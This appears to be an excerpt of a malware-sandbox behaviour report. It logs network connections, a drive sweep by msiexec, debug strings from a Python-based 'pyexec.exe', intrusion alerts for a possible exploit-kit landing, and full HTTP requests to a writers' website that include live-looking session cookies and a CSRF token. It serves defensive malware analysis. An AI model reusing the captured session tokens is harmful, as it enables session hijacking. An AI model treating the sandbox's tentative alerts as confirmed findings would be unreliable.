          Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49892 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49915 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49916 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.190.159.71:443 -> 192.168.2.16:49917 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49918 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49919 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 150.171.74.254:443 -> 192.168.2.16:49935 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 150.171.74.254:443 -> 192.168.2.16:49938 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49939 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.74.67.245:443 -> 192.168.2.16:50000 version: TLS 1.2
          Source: Binary string: msvcr90.i386.pdb source: msvcr90.dll.21.dr
          Source: Binary string: wntdll.pdbUGP source: pyexec.exe, 00000015.00000002.2072736317.0000000003C30000.00000004.00000800.00020000.00000000.sdmp, pyexec.exe, 00000015.00000002.2065553931.00000000022FF000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: pyexec.exe, 00000015.00000002.2072736317.0000000003C30000.00000004.00000800.00020000.00000000.sdmp, pyexec.exe, 00000015.00000002.2065553931.00000000022FF000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\build27\cpython\PCBuild\python27.pdb source: pyexec.exe, 00000015.00000002.2074989941.000000006C69A000.00000002.00000001.01000000.00000007.sdmp, pyexec.exe, 00000015.00000003.2063000404.0000000003FEE000.00000004.00000001.00020000.00000000.sdmp, pyexec.exe, 00000016.00000002.2154631262.000000006C134000.00000002.00000001.01000000.0000000A.sdmp, pyexec.exe, 0000001C.00000002.2290472986.000000006C114000.00000002.00000001.01000000.0000000A.sdmp
          Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
          Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.16:49806 -> 104.244.42.67:443
          Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.16:49803 -> 162.159.140.229:443
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: winningwriters.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/css/style.css HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /assets/fancybox/jquery.fancybox.css HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /assets/css/responsive-nav-styles.css HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /assets/js/responsive-nav-scripts.js HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /graphics/wergle/wergle_2024_top_banner_970_250.jpg HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /graphics/tomstory/tom_story_wide_banner_2025.png HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /assets/js/responsive-nav-scripts.js HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /graphics/newsletter/best_free_contests_top_banner_2024.png HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /graphics/wergle/wergle_2024_top_banner_970_250.jpg HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /graphics/advertising/origin_story_banner_for_ww_2408.jpg HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /graphics/tomstory/tom_story_wide_banner_2025.png HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /jquery-migrate-1.2.1.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /v/t51.2885-15/466498990_932073868801787_4615250428975556945_n.jpg?_nc_cat=108&ccb=1-7&_nc_sid=18de74&_nc_ohc=K2QYvU4QDFwQ7kNvgHexzPp&_nc_zt=23&_nc_ht=scontent-ord5-1.cdninstagram.com&edm=AL-3X8kEAAAA&oh=00_AYB6H6C6vXmQz4o0NOzYmapDE6_aoksGSCqZ4e0xcfBfbw&oe=6741529C HTTP/1.1Host: scontent-ord5-1.cdninstagram.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/images/social-sprite-2019.png HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/assets/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /assets/images/seal-transparent-25x40-2019.png HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/assets/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /assets/images/search.png HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/assets/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /v/t51.2885-15/466782117_1219872592424759_7207578631427954565_n.jpg?_nc_cat=108&ccb=1-7&_nc_sid=18de74&_nc_ohc=bwWPeBBNLe4Q7kNvgEG96g1&_nc_zt=23&_nc_ht=scontent-ord5-1.cdninstagram.com&edm=AL-3X8kEAAAA&oh=00_AYBDimk3lRDq0ZNf5WzC3TsApGkaW3ypEC04xNJeJXPwgg&oe=67416EA5 HTTP/1.1Host: scontent-ord5-1.cdninstagram.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /v/t51.2885-15/467112998_3886836521643779_8605725034765016710_n.jpg?_nc_cat=101&ccb=1-7&_nc_sid=18de74&_nc_ohc=_cdycnS1RYQQ7kNvgEJjUe2&_nc_zt=23&_nc_ht=scontent-ord5-1.cdninstagram.com&edm=AL-3X8kEAAAA&oh=00_AYDPIeUcR1p4zvzbgpOdfbp9YsIY1oSApIPk7ope3-S9-Q&oe=674157AC HTTP/1.1Host: scontent-ord5-1.cdninstagram.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/images/social-sprite-2020_new.png HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/assets/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /graphics/newsletter/best_free_contests_top_banner_2024.png HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /graphics/advertising/origin_story_banner_for_ww_2408.jpg HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
